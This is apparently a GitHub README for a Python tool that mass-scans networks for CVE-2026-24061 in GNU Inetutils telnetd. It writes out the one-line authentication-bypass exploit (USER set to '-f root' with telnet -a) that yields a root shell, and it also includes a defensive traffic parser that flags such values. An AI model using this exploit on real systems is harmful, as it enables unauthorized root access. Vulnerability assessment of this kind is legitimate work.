cumakurt/tscan

Telnetd Auth Bypass Scanner (CVE-2026-24061)

A Python-based scanner for detecting and exploiting the CVE-2026-24061 vulnerability in GNU Inetutils telnetd services. This tool scans IP addresses or networks for vulnerable telnetd services that allow authentication bypass leading to root shell access.


⚠️ IMPORTANT LEGAL NOTICE AND DISCLAIMER

THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.

1. Educational Purpose

This application has been developed solely for educational purposes to demonstrate security vulnerabilities and to assist in authorized security testing and research.

2. No Warranty

THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. THE AUTHORS AND CONTRIBUTORS DO NOT GUARANTEE THAT THE SOFTWARE WILL BE ERROR-FREE, SECURE, OR FUNCTIONAL. The software may contain bugs, errors, or other defects.

3. User Responsibility

ALL RESPONSIBILITY AND LIABILITY FOR THE USE OF THIS SOFTWARE RESTS ENTIRELY WITH THE USER. The authors, contributors, and distributors of this software shall not be held liable for any damages, losses, or legal consequences resulting from the use, misuse, or inability to use this software.

4. Unauthorized Use Prohibited

This tool must ONLY be used on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal and may result in criminal prosecution.

5. No Guarantees

The authors do NOT guarantee:

  • The accuracy of scan results
  • The security of the application itself
  • Compatibility with all systems
  • Absence of bugs or errors
  • Any specific functionality or performance

By using this software, you acknowledge that you have read, understood, and agree to be bound by these terms. If you do not agree, do not use this software.


Developer

Developed by: Cuma KURT
Email: cumakurt@gmail.com
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/

Vulnerability Information

CVE-2026-24061: GNU Inetutils telnetd through version 2.7 allows remote authentication bypass via a -f root value for the USER environment variable.

CVSS Score: 9.8 (Critical)

Reference: NVD CVE-2026-24061

Features

  • 🔍 Port Scanning: Detects open telnet ports (default: 23, customizable)
  • 🎯 Vulnerability Detection: Tests for CVE-2026-24061 exploitability
  • ⚡ Multi-threaded: Fast concurrent scanning with configurable thread count
  • 📁 Flexible Input: Supports IP addresses, CIDR networks, and file-based target lists
  • 🗺️ Auto-Detection: Automatically detect and scan subnets from routing table
  • 🛑 Safe Interrupt: Ctrl+C safely stops scan and shows partial results
  • 📊 Real-time Progress: Progress bar with statistics and findings

Installation

Prerequisites

  • Python 3.6 or higher
  • telnet client (usually pre-installed on Linux/macOS)

Install Dependencies

pip3 install -r requirements.txt

Note: Most dependencies are part of the Python standard library. The tool works out of the box with Python 3.6+.

Usage

Basic Usage

# Scan a single IP address
python3 tscan.py 192.168.1.1

# Scan a CIDR network
python3 tscan.py 192.168.1.0/24

# Scan with custom port
python3 tscan.py -p 2323 192.168.1.1

# Scan targets from a file
python3 tscan.py targets.txt

# Scan multiple IP addresses
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# Scan multiple CIDR networks
python3 tscan.py 192.168.1.0/24 10.0.0.0/16

Performance Tuning

# Increase thread count for faster scanning (100 threads)
python3 tscan.py -t 100 192.168.1.0/24

# Increase timeout for slow networks
python3 tscan.py --timeout 10 192.168.1.0/24

# Combine both for large network scans
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16

Auto-Detection Mode

# Automatically detect and scan all subnets from system routing table
python3 tscan.py --auto
# or use short form:
python3 tscan.py -a

# Auto-detect with custom port
python3 tscan.py --auto -p 2323
# or:
python3 tscan.py -a -p 2323

# Auto-detect with high thread count
python3 tscan.py --auto -t 200
# or:
python3 tscan.py -a -t 200

Note: --auto mode reads the system routing table using the ip route list or route -n command and automatically scans all detected subnets.

Real-World Examples

# Example 1: Quick scan of local network
python3 tscan.py 192.168.1.0/24

# Example 2: Fast scan with high concurrency
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# Example 3: Scan non-standard telnet port
python3 tscan.py -p 2323 192.168.1.0/24

# Example 4: Auto-detect and scan all local network subnets
python3 tscan.py --auto
# or:
python3 tscan.py -a

# Example 5: Auto-detect with custom settings
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# or:
python3 tscan.py -a -p 2323 -t 100 --timeout 8

Command Line Options

positional arguments:
  targets               IP address(es), CIDR network(s), or file path(s) containing targets

options:
  -h, --help            show this help message and exit
  -p, --port PORT       Telnet port to scan (default: 23)
  -t, --threads THREADS Number of concurrent threads (default: 50)
  --timeout TIMEOUT     Connection timeout in seconds (default: 5)
  -v, --verbose         Verbose output
  -a, --auto            Automatically detect and scan all subnets from system routing table (route -n or ip route list)

Input File Format

Create a text file with one target per line:

192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16

Lines starting with # are treated as comments and ignored.

Output

The tool provides:

  1. Real-time Progress: Shows results as they are discovered

    • Progress bar with percentage and statistics
    • Vulnerable host count displayed in progress bar
    • [!] - Vulnerable host
    • [~] - Port open but not vulnerable
    • Port closed targets are silently skipped
    • Ctrl+C (KeyboardInterrupt): Safely interrupts scan and shows partial results immediately
  2. Summary Report: Includes:

    • Total telnet services found
    • Number of vulnerable hosts
    • Detailed list of vulnerable hosts

Example Output

Basic Scan Output

[*] Starting scan on 256 target(s)...
[*] Port: 23, Threads: 50, Timeout: 5s

[*] Progress: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Open: 2 | Vulnerable: 1
[!] 192.168.1.100:23 - VULNERABLE
[*] Progress: [████████████████████████████████████] 100.0% (256/256) | Open: 3 | Vulnerable: 1
[+] Scan completed: 256/256 targets scanned

======================================================================
Scan Results Summary
======================================================================

Telnet services found: 3
Vulnerable hosts: 1

[!] VULNERABLE HOSTS:

  ● 192.168.1.100:23
    Output: uid=0(root) gid=0(root) groups=0(root)...

[~] Telnet services found but not vulnerable:

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] Scan completed in 12.34 seconds

How It Works

  1. Port Detection: Checks whether the telnet port is open on each target IP
  2. Exploit Attempt: For open ports, attempts the CVE-2026-24061 exploit:
    • Sets the USER="-f root" environment variable
    • Connects with the telnet -a command
    • Sends test commands to verify root shell access
  3. Result Classification: Categorizes results as vulnerable or not vulnerable

Exploit Details

The vulnerability allows authentication bypass by setting the USER environment variable to -f root:

USER="-f root" telnet -a TARGET_IP [PORT]

This causes telnetd to interpret the USER variable as a flag, bypassing authentication and granting root access.
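On the monitoring side, the same condition can be detected in captured telnet traffic by decoding the environment option and flagging any USER value that begins with a dash. The following parser is an added example, not part of tscan; it assumes the client sends USER in the NEW-ENVIRON option (RFC 1572), as `telnet -a` clients commonly do, and the function names and the two sample byte strings are constructed for illustration.

```python
# Added example (not from tscan). Constants follow RFC 854 and RFC 1572.
import re
IAC, SB, SE, NEW_ENVIRON = 255, 250, 240, 39
IS, INFO = 0, 2
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3
SUBNEG = re.compile(rb"\xff\xff|\xff\xfa(.)((?:[^\xff]|\xff\xff)*)\xff\xf0", re.S)

def subnegotiations(stream):
    """Yield (option, payload) per IAC SB <option> ... IAC SE, un-doubling IAC IAC."""
    for m in SUBNEG.finditer(stream):
        if m.group(1) is not None:      # the other alternative is an escaped 0xFF data byte
            yield m.group(1)[0], m.group(2).replace(b"\xff\xff", b"\xff")

def environ_vars(payload):
    """Decode an IS/INFO payload into {name: value}; ESC quotes the next byte."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    fields, k = [], 1                   # (type, bytearray) pairs in wire order
    while k < len(payload):
        if payload[k] in (VAR, VALUE, USERVAR):
            fields.append((payload[k], bytearray()))
        elif fields:
            if payload[k] == ESC and k + 1 < len(payload):
                k += 1                  # ESC: the next byte is literal data
            fields[-1][1].append(payload[k])
        k += 1
    result, name = {}, None
    for kind, data in fields:
        text = data.decode("latin-1")
        if kind != VALUE:
            name, result[text] = text, ""
        elif name is not None:
            result[name] = text
    return result

def option_like_users(stream):
    """Return USER values starting with '-', which can be interpreted as a flag."""
    users = [environ_vars(p).get("USER", "") for opt, p in subnegotiations(stream)
             if opt == NEW_ENVIRON]
    return [u for u in users if u.startswith("-")]

# Constructed client-to-server samples: IAC WILL NEW-ENVIRON, then the IS reply.
SAMPLE_BENIGN = b"\xff\xfb\x27\xff\xfa\x27\x00\x00USER\x01alice\xff\xf0"
SAMPLE_FLAGGED = b"\xff\xfb\x27\xff\xfa\x27\x00\x00USER\x01-f root\xff\xf0"
```

Feed `option_like_users` the reassembled client-to-server bytes of a session; a non-empty result is worth alerting on regardless of whether the server is patched.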

Limitations

  • Requires telnet client to be installed
  • Only works against vulnerable telnetd versions (≤ 2.7)
  • Auto-detection mode requires the ip route list or route -n command

Troubleshooting

"telnet command not found"

Install telnet client:

# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# Usually pre-installed

No results found

  • Verify targets are reachable
  • Check firewall rules
  • Ensure telnet services are actually running
  • Try increasing timeout: --timeout 10

Legal and Ethical Use

This tool is intended for:

  • ✅ Authorized penetration testing
  • ✅ Security research on your own systems
  • ✅ Vulnerability assessment with proper authorization
  • ✅ Educational purposes in controlled environments

DO NOT use this tool for:

  • ❌ Unauthorized access to systems
  • ❌ Illegal hacking activities
  • ❌ Any activity without explicit permission

License

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see https://www.gnu.org/licenses/.

Full License Text

See LICENSE file for the complete GNU General Public License v3.0 text.

Disclaimer

THE AUTHORS AND CONTRIBUTORS ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS TOOL.

This tool is provided FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.

USE AT YOUR OWN RISK. All responsibility and liability for the use of this software rests entirely with the user. The authors do not guarantee the accuracy, security, or functionality of this software. The software is provided "AS IS" without any warranty of any kind.

This application has been developed solely for educational purposes. By using this software, you acknowledge that:

  • You understand this is an educational tool
  • All responsibility for its use is yours
  • The authors provide no guarantees or warranties
  • You will only use it on systems you own or have explicit written permission to test
  • Unauthorized use is illegal and may result in criminal prosecution

If you do not agree to these terms, DO NOT USE THIS SOFTWARE.
